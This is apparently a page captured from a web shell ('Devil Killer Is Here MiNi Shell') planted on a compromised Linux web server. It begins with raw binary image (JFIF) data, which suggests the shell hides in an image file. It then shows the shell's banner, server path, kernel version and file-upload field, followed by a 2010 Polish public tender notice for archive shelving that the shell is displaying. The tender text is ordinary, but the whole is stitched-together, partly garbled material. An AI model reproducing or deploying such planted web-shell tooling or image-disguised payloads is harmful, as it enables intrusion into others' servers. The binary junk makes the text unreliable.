JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100517/125029-N-2010.html

<p class="kh_header"><b>Warszawa: Wykonanie, dostawa i montaż systemów aktowych dla Archiwum Zakładowego</b><br>
<b>Numer ogłoszenia: 125029 - 2010; data zamieszczenia: 17.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa , Al. Jana Pawła II 70, 00-175 Warszawa, woj. mazowieckie, tel. 022 5950050; 5950001, faks 022 8602903; 6361677,3185411.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie, dostawa i montaż systemów aktowych dla Archiwum Zakładowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie projektu, dostawa i montaż regałów przesuwnych wraz z podłogami jezdnymi oraz regałów stacjonarnych do pomieszczeń Archiwum Zakładowego w Centrali Agencji Restrukturyzacji i Modernizacji Rolnictwa z siedzibą - Al. Jana Pawła II 70, 00-175 Warszawa (magazyn archiwum zakładowego ul. Poleczki 33, 02-854 Warszawa.)
Projekt, dostawa i montaż regałów przesuwnych i stacjonarnych.
a. Regał przesuwny, dwustronny o szerokości 60cm ( +2cm), wykonany ze stali, ściany boczne pełne, malowany metodą proszkową na kolor jasno-szary. Regał wyposażony w półki o nośności min. 70 kg/mb., mocowane na zaczepach podtrzymujących półkę w czterech punktach z płynną regulacją, co 2 cm lub mniejszą, na całej wysokości. Każda podwójna półka wyposażona w szybko demontowalne listwy zapółkowe uniemożliwiające przesunięcie się zbiorów na sąsiednią półkę wzdłuż dłuższej jej krawędzi. Regał zaopatrzony w tory jezdne ułożone na istniejącej podłodze w systemie tzw. nawierzchniowym. Szyny wykonane z materiału zabezpieczonego przez korozją przez ocynkowanie lub ze stali szlachetnej. W przypadku wystających szyn zgodnie z warunkami BHP należy zastosować obustronne najazdy aluminiowe. 
Regał musi być wyposażony w mechanizm umożliwiający przesuwanie, składający się z korby i cichobieżnej przekładni. Korba powinna być wykonana zgodnie z zasadami ergonomii.  Uchwyt do kręcenia korby ruchomy (obrót wokół własnej osi). Korba wyposażona w blokadę przesuwu umieszczoną w jej środku, unieruchamiającą regał podczas pracy. Maksymalna siła potrzebna do przesunięcia regału 5 kg ( +0,5 kg). Ściana czołowa wyposażona w szyldy do numeracji i oznaczenia zawartości regału. Odległość w prześwicie pomiędzy półkami minimalna 36 cm ( +1 cm), maksymalna 39 cm ( +1 cm) w zależności od wysokości możliwej zabudowy regałami w pomieszczeniu magazynu, grubość półki 2,5 cm ( +0,5 cm). Wysokość pierwszej płaszczyzny powierzchni półki od podłoża, na której przechowywane będą akta musi mieścić  się w granicach od 10-20 cm.
Wszystkie regały zaopatrzone w odboje zabezpieczające przed przypadkowym przygnieceniem palców podczas przesuwania oraz blokady uniemożliwiające przewrócenie się regału. Regały zakończone półką wieńczącą. 
Całość konstrukcji, zarówno regałów jak i torów jezdnych, musi zapewniać stabilność i pełne bezpieczeństwo pracy. 

b. Regał przesuwny, jednostronny zamykający segment regałów o szerokości 30 cm ( +1cm), wykonany ze stali, ściany boczne pełne, malowany metodą proszkową na kolor jasno-szary. Regał wyposażony w półki o nośności min. 70 kg/mb., mocowane na zaczepach podtrzymujących półkę w czterech punktach z płynną regulacją, co 2 cm lub mniejszą, na całej wysokości. Regał zaopatrzony w tory jezdne ułożone na istniejącej podłodze w systemie tzw. nawierzchniowym. Szyny wykonane z materiału zabezpieczonego przez korozją przez ocynkowanie lub ze stali szlachetnej. W przypadku wystających szyn zgodnie z warunkami BHP należy zastosować obustonne najazdy aluminiowe. 
Regał musi być wyposażony w mechanizm umożliwiający przesuwanie, składający się z korby i cichobieżnej przekładni zębatej. Korba powinna być wykonana zgodnie z zasadami ergonomii. Uchwyt do kręcenia korby ruchomy (obrót wokół własnej osi). Korba wyposażona w  blokadę przesuwu umieszczoną w jej środku, unieruchamiającą regał podczas pracy. Maksymalna siła potrzebna do przesunięcia regału 5 kg (+0,5) kg). Ściana czołowa wyposażona w szyldy do numeracji i  oznaczenia zawartości regału. Odległość w prześwicie pomiędzy półkami minimalna 36 cm ( +1 cm), maksymalna 39 cm ( +1 cm) w zależności od wysokości możliwej zabudowy regałami w pomieszczeniu magazynu, grubość półki 2,5 cm ( +0,5 cm). Wysokość pierwszej płaszczyzny powierzchni półki od podłoża, na której przechowywane będą akta musi mieścić się w granicach od 10-20 cm. 
Wszystkie regały zaopatrzone w odboje zabezpieczające przed przypadkowym przygnieceniem palców podczas przesuwania oraz blokady uniemożliwiające przewrócenie się regału. Regały zakończone półką wieńczącą. 
Całość konstrukcji, zarówno regałów jak i torów jezdnych, musi zapewniać stabilność i pełne bezpieczeństwo pracy.

c. Regał stacjonarny, dwustronny o szerokości 60cm ( +2cm), wykonany ze stali, ściany boczne pełne, malowany metodą proszkową na kolor jasno-szary. Regał wyposażony w półki o nośności min. 70 kg/mb., mocowane na zaczepach podtrzymujących półkę w czterech punktach z płynną regulacją, co 2 cm lub mniejszą, na całej wysokości. Każda podwójna półka wyposażona w szybko demontowalne listwy zapółkowe uniemożliwiające przesunięcie się zbiorów na sąsiednią półkę wzdłuż dłuższej jej krawędzi. 
Ściana czołowa wyposażona w szyldy do numeracji i oznaczenia zawartości regału. Odległość   w prześwicie pomiędzy półkami minimalna 36 cm ( +1 cm), maksymalna 39 cm ( +1 cm) w zależności od wysokości możliwej zabudowy regałami w pomieszczeniu magazynu, grubość półki 2,5 cm ( +0,5 cm). Wysokość pierwszej płaszczyzny powierzchni półki od podłoża na której przechowywane będą akta musi mieścić się w granicach od 10-20 cm. 
Wszystkie regały zaopatrzone w odboje zabezpieczające przed przypadkowym przygnieceniem palców podczas przesuwania oraz blokady uniemożliwiające przewrócenie się regału. Regały zakończone półką wieńczącą.
Całość konstrukcji musi zapewniać stabilność i pełne bezpieczeństwo pracy.
d. Regał stacjonarny, jednostronny o szerokości 30 cm ( +1cm), wykonany ze stali, ściany boczne pełne, malowany metodą proszkową na kolor jasno-szary. Regał wyposażony w półki o nośności min. 70 kg/mb., mocowane na zaczepach podtrzymujących półkę w czterech punktach z płynną regulacją, co 2 cm lub mniejszą, na całej wysokości.
Ściana czołowa wyposażona w szyldy do numeracji i oznaczenia zawartości regału. Odległość w prześwicie pomiędzy półkami minimalna 36 cm ( +1 cm), maksymalna 39 cm ( +1 cm) w zależności od wysokości możliwej zabudowy regałami w pomieszczeniu magazynu, grubość półki 2,5 cm ( +0,5 cm). Wysokość pierwszej płaszczyzny powierzchni półki od podłoża na której przechowywane będą akta musi mieścić się w granicach od 10-20 cm.
Wszystkie regały zaopatrzone w odboje zabezpieczające przed przypadkowym przygnieceniem palców podczas przesuwania oraz blokady uniemożliwiające przewrócenie się regału. Regały zakończone półką wieńczącą.
Całość konstrukcji musi zapewniać stabilność i pełne bezpieczeństwo pracy.


Wymagania
BEZPIECZEŃSTWO
Całość konstrukcji, zarówno regałów jak i torów jezdnych musi zapewniać stabilność, pełne bezpieczeństwo i higienę pracy zgodnie z aktualnie obowiązującymi w Polsce normami i przepisami w zakresie konstrukcji oraz bezpieczeństwa i higieny pracy.
Maksymalne obciążeniu stropów wg konstruktorów budynku dla poziomu lokalizacji archiwum zakładowego wynosi 1500 kg/m2.

GWARANCJA
Wymagana minimalna gwarancja:
-10 lat od daty protokolarnego odbioru.
ILOŚĆ I ROZMIESZCZENIE REGAŁÓW I SZAF
-Regały przejezdne dwustronne według projektu dostawcy. 
Ilość i rozmieszczenie regałów według projektu dostawcy z maksymalnym wykorzystaniem wielkości powierzchni, wysokości magazynu oraz rozmieszczeniem przedstawionym na rysunku w załączniku nr 4 z uwzględnieniem łatwego dostępu do gromadzonych akt.
-Regały przejezdne jednostronne według projektu dostawcy. 
Ilość i rozmieszczenie regałów według projektu dostawcy z maksymalnym wykorzystaniem wielkości powierzchni, wysokości magazynu oraz rozmieszczeniem przedstawionym na rysunku w załączniku nr 4 z uwzględnieniem łatwego dostępu do gromadzonych akt.
-Regały stacjonarne dwustronne według projektu dostawcy.
Ilość i rozmieszczenie regałów według projektu dostawcy z maksymalnym wykorzystaniem wielkości powierzchni, wysokości magazynu oraz rozmieszczeniem przedstawionym na rysunku w załączniku nr 4 z uwzględnieniem łatwego dostępu do gromadzonych akt.
-Regały stacjonarne jednostronne według projektu dostawcy.
Ilość i rozmieszczenie regałów według projektu dostawcy z maksymalnym wykorzystaniem wielkości powierzchni, wysokości magazynu oraz rozmieszczeniem przedstawionym na rysunku w załączniku nr 4 z uwzględnieniem łatwego dostępu do gromadzonych akt.

UWAGA!
      
Wykonawca przed złożeniem oferty ma obowiązek przeprowadzenia wizji lokalnej w pomieszczeniu, w którym będą montowane regały przesuwne oraz dokonania pomiarów we własnym zakresie w celu złożenia projektu maksymalnie wykorzystującego powierzchnie i wysokość lokalu przeznaczonego do wyposażenia  w regały z uwzględnieniem maksymalnej ilości metrów bieżących powierzchni przechowalniczej  z zapewnieniem pełnego bezpieczeństwa i higieny pracy zgodnie z aktualnie obowiązującymi w Polsce normami i  przepisami  w zakresie konstrukcji oraz bezpieczeństwa i higieny pracy.
W trakcie dokonywania pomiarów przez Wykonawcę, Zamawiający przekaże Wykonawcy zamówienia stosowne rysunki, projekty dotyczące rozmieszczenia instalacji oraz wskaże poziom zerowy powierzchni podłogi wykończonej. 
Tolerancja wykonania podłogi budynku jest zgodna z normą PN-62/B-10144 wskazaną przez konstruktorów budynku.
Wizję będzie można przeprowadzić w terminie  10 dni od dnia zamieszczenia Ogłoszenia o zamówieniu i SIWZ na stronie internetowej Zamawiającego, po wcześniejszym uzgodnieniu telefonicznym z Panem Tomaszem Borowieckim nr tel:  22 318 42 57..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.13.11.00-0, 98.30.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca zobowiązany jest wnieść wadium w wysokości:  6 000,00 zł (słownie: sześć tysięcy złotych 00/100).
2. Wadium może być wniesione w:
(a) pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
(b) gwarancjach bankowych,
(c) gwarancjach ubezpieczeniowych,
(d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 ze zm.). 
3. Wadium w formie pieniądza należy wnieść na rachunek bankowy w Banku Gospodarstwa Krajowego III Oddział w Warszawie numer rachunku - 45 1130 1062 8000 0000 0002 8175, z dopiskiem na przelewie: Wadium w postępowaniu na wykonanie, dostawę i montaż systemów aktowych dla Archiwum Zakładowego2.
4. Wadium wnoszone w innej formie niż pieniądz, należy w oryginale załączyć do oferty w osobnej kopercie, natomiast kopię dokumentu potwierdzającego wniesienie wadium w innej formie niż pieniądz należy dołączyć do oferty. Dokument wadium musi wyraźnie wskazywać na wszystkie okoliczności jego utraty określone w art. 46 ust. 4a i ust. 5 ustawy.
5. Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 ustawy.
6. Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Spełniają warunki określone w art. 22 ust. 1 ustawy,
2. Posiadają wiedzę i doświadczenie, tj. zrealizowali, a w przypadku świadczeń okresowych lub ciągłych również realizują, usługi w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie usługi o podobnym charakterze do zakresu przedmiotowego zamówienia, tj.  wykonanie, dostawa i montaż systemów aktowych o wartości nie mniejszej niż 100 000,00 zł (słownie: sto tysięcy złotych 00/100) brutto każda.
3. Ocena spełniania w/w warunków dokonana zostanie w oparciu o informacje zawarte we właściwych dokumentach wyszczególnionych w rozdziale VII specyfikacji istotnych warunków zamówienia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunek Wykonawca spełnił.
4. Zamawiający, na podstawie art. 26 ust. 3 ustawy wezwie Wykonawców, którzy w określonym terminie nie złożą oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty o których mowa w art. 25 ust. 1 ustawy zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnienie przez oferowane dostawy wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.
5. Niespełnienie, z zastrzeżeniem postanowień pkt 4, chociażby jednego z powyższych warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli w wykazie wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert - Wykonawca wykazał doświadczenie innego podmiotu winien złożyć  w szczególności pisemne zobowiązanie tego podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia oraz pisemne zobowiązanie tego podmiotu do uczestnictwa w realizacji części zamówienia. (wg. Załącznika nr  3a do specyfikacji);
2. Projekt rozmieszczenia regałów przesuwnych, podłóg jezdnych do regałów przesuwnych (wg załącznika nr 5. do SIWZ);
 3. Dowód wniesienia wadium (w przypadku wniesienia wadium w innej formie niż pieniądz, winno ono obowiązywać przez cały okres związania ofertą);
4. Pełnomocnictwo (oryginał lub kopię potwierdzoną notarialnie) do podpisania oferty, jeżeli oferta nie została podpisana przez osoby upoważnione do tych czynności dokumentem rejestracyjnym.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - zaoferowane metry bieżące półek - 60</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa
ul. Żelazna 59
00-848 Warszawa, pok. 176 Ip..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2010 godzina 11:00, miejsce: Agencja Restrukturyzacji i Modernizacji Rolnictwa 
 ul. Żelazna 59, 00-848 Warszawa
Kancelaria Główna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





